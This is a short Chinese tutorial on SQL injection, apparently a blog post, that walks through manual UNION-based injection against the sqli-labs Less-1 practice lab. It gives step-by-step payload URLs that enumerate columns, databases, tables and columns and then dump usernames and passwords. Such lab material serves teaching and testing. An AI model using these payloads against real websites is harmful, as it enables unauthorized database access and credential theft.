SQL注入原理及危害

一、SQL注入原理与危害

原理: 由于用户不可控输入,攻击者可以任意的输入网易的SQL语句,从而对数据库产生风险。

危害:

数据操作

文件操作

命令操作

绕过登录

二、联合查询注入

联合查询的核心:  union

union:两个查询语句列数相同

 

 

三、联合查询手工注入流程

   判断列数--

N=m页面正常,但N=m+1页面异常,原始查询由m列

http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1' order by N--+

   判断回显位置

。 原始查询为空----》

http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,3--+

 

  查询数据

○   查询数据库用户

http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,user()--+

○   查询当前数据库名

http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,database()--+

○   查询所有数据库

http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name)  from information_schema.schemata--+

○   查询指定库的表

http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name)  from information_schema.tables where

table_schema="security"--+

○   读取列名

 

读取列名

http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name)  from information_schema.columns where

table_schema="security"  and table_name="users"--+

○   获取数据

http://192.168.30.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(id,username,password)  from users--+

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值